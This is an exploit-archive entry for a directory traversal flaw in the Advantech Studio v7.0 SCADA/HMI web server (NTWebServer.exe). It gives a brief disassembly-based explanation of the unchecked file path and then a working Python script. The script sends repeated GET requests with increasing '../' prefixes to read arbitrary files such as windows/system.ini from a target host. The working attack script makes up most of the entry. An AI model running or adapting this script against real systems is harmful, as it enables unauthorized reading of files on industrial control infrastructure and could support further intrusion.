# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day # Google Dork: N/A # Date: 2012-12-03 # Exploit Author: Nin3 # Vendor Homepage: http://advantech.com.tw # Version: 7.0 Build Number 0501.1111.0402.0000 # Tested on: Windows # CVE : N/A ''' Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe, the web server is a standalone executable that is used along side every project' to serve as a web based management system with the help of an activex. The flaw occurs because of a lack of any check on the path of the file requested. in function sub_401A90: .text:00402A4A push 0 ; dwFlagsAndAttributes .text:00402A4C push 3 ; dwCreationDisposition .text:00402A4E push 3 ; dwShareMode .text:00402A50 push 80000000h ; dwDesiredAccess .text:00402A55 mov edx, [ebp+lpFileName] .text:00402A58 push edx ; lpFileName .text:00402A59 lea ecx, [ebp+var_1C] .text:00402A5C call sub_401A90 sub_401A90 use CreateFileW function directly. .text:00401A97 push 0 ; hTemplateFile .text:00401A99 mov eax, [ebp+dwFlagsAndAttributes] .text:00401A9C push eax ; dwFlagsAndAttributes .text:00401A9D mov ecx, [ebp+dwCreationDisposition] .text:00401AA0 push ecx ; dwCreationDisposition .text:00401AA1 push 0 ; lpSecurityAttributes .text:00401AA3 mov edx, [ebp+dwShareMode] .text:00401AA6 push edx ; dwShareMode .text:00401AA7 mov eax, [ebp+dwDesiredAccess] .text:00401AAA push eax ; dwDesiredAccess .text:00401AAB mov ecx, [ebp+lpFileName] .text:00401AAE push ecx ; lpFileName .text:00401AAF call ds:CreateFileW ''' import argparse import httplib MAX_NESTED_DIRECTORY = 32 def main(): parser = argparse.ArgumentParser() parser.add_argument('-d') parser.add_argument('-p') parser.add_argument('-f') args = parser.parse_args() if args.d == None or args.p == None or args.f == None: print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini" return httpConn = httplib.HTTPConnection(args.d, int(args.p)) for i in xrange(0, MAX_NESTED_DIRECTORY): temp = MakePath(args.f, i) httpConn.request('GET', temp) resp = httpConn.getresponse() content = resp.read() if resp.status == 404: print 'Not found ' + temp else: print 'Found ' + temp print'------------------------------------------' print content print'---------------------------------------EOF' break def MakePath(f, count): a = "" for i in xrange(0, count): a = a + "../" return a + f if __name__ == "__main__": main()Брой прочитания на тази страница: 1204
Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day